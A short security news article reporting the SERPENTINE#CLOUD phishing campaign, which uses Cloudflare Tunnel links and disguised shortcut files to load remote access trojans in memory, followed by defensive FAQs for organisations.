2 min read
Malware campaign hides RATs behind Cloudflare tunnels and phishing chains
Farah Amod
Jun 28, 2025 10:09:08 AM

Researchers have uncovered a sophisticated phishing campaign using Cloudflare Tunnel links to deliver in-memory malware payloads across multiple regions.
What happened
A newly discovered campaign dubbed SERPENTINE#CLOUD is using Cloudflare Tunnel infrastructure to host malicious payloads and deliver them through phishing emails. The emails, often disguised as payment or invoice-related messages, link to zipped Windows shortcut files (LNKs) that trigger a multi-step infection process when opened. This attack chain ultimately results in remote access trojans (RATs) being deployed in memory, making detection significantly harder.
According to an article published in Security Week, the campaign targets victims across the U.S., U.K., Germany, and parts of Europe and Asia. The identity of the threat actor remains unknown, though their command of English has been noted.
Going deeper
The infection begins when a user opens a disguised shortcut file (LNK), which connects to a WebDAV share hosted through Cloudflare Tunnel. From there, it downloads a Windows Script File (WSF) that executes silently in the background using cscript.exe. That script then retrieves a batch file named kiki.bat, which handles the malware installation process.
The batch file runs several actions: it opens a decoy document to distract the user, scans the system for antivirus tools, and loads Python-based shellcode directly into memory. The final payload is a Donut-packed remote access tool like AsyncRAT or Revenge RAT, which gives the attacker control over the infected machine without leaving files on disk.
Traditional security tools often miss these attacks because the malware lives in memory and avoids writing files. Cloudflare’s trusted domain (*.trycloudflare.com) and tunneling service also help attackers hide their activity. By using temporary infrastructure and avoiding direct exposure, attackers gain stealth and flexibility while bypassing common detection methods.
What was said
The Security Week article notes that the campaign shares traits with earlier attacks observed by eSentire and Proofpoint, but introduces more advanced payloads and deeper obfuscation. These changes may suggest existing actors are refining their methods, though researchers acknowledge the possibility that unrelated groups are adopting similar techniques.
Security researcher Tim Peck said, “The abuse of Cloudflare Tunnel infrastructure further complicates network visibility by giving the actor a disposable and encrypted transport layer for staging malicious files without maintaining traditional infrastructure.”
The big picture
The SERPENTINE#CLOUD campaign reflects a shift in phishing-based malware delivery, combining social engineering, cloud tunneling, memory injection, and living-off-the-land techniques to evade detection. These methods reduce dependence on traditional infrastructure and make attacks harder to trace. Abuse of trusted cloud subdomains presents a growing challenge for defenders using domain-based filtering. As similar campaigns adopt more modular and stealthy approaches, security teams are being pushed to adopt behavior-based detection and enforce stricter controls on third-party service use.
FAQs
What is Cloudflare Tunnel, and why is it being misused?
Cloudflare Tunnel allows developers to expose local servers to the internet using secure tunnels. Attackers misuse it to host malicious content on temporary, legitimate-looking subdomains without needing to register their own.
How can users spot malicious LNK files in phishing emails?
These shortcut files often masquerade as documents or PDFs. Warning signs include unusual file extensions, password-protected ZIP attachments, and unexpected prompts to enable macros or run scripts.
What is in-memory malware, and why is it hard to detect?
In-memory malware runs directly from RAM without writing files to disk. This minimizes traces and often evades antivirus programs that focus on file-based detection.
Are cloud-based domains like trycloudflare.com typically blocked by security tools?
Not usually. These domains are widely trusted and used for legitimate purposes, making them difficult to blacklist without risking false positives or service disruptions.
What steps can organizations take to defend against campaigns like SERPENTINE#CLOUD?
Organizations should implement advanced threat detection that monitors script behavior, block LNK and WSF attachments where possible, and conduct regular phishing awareness training to reduce risk from social engineering.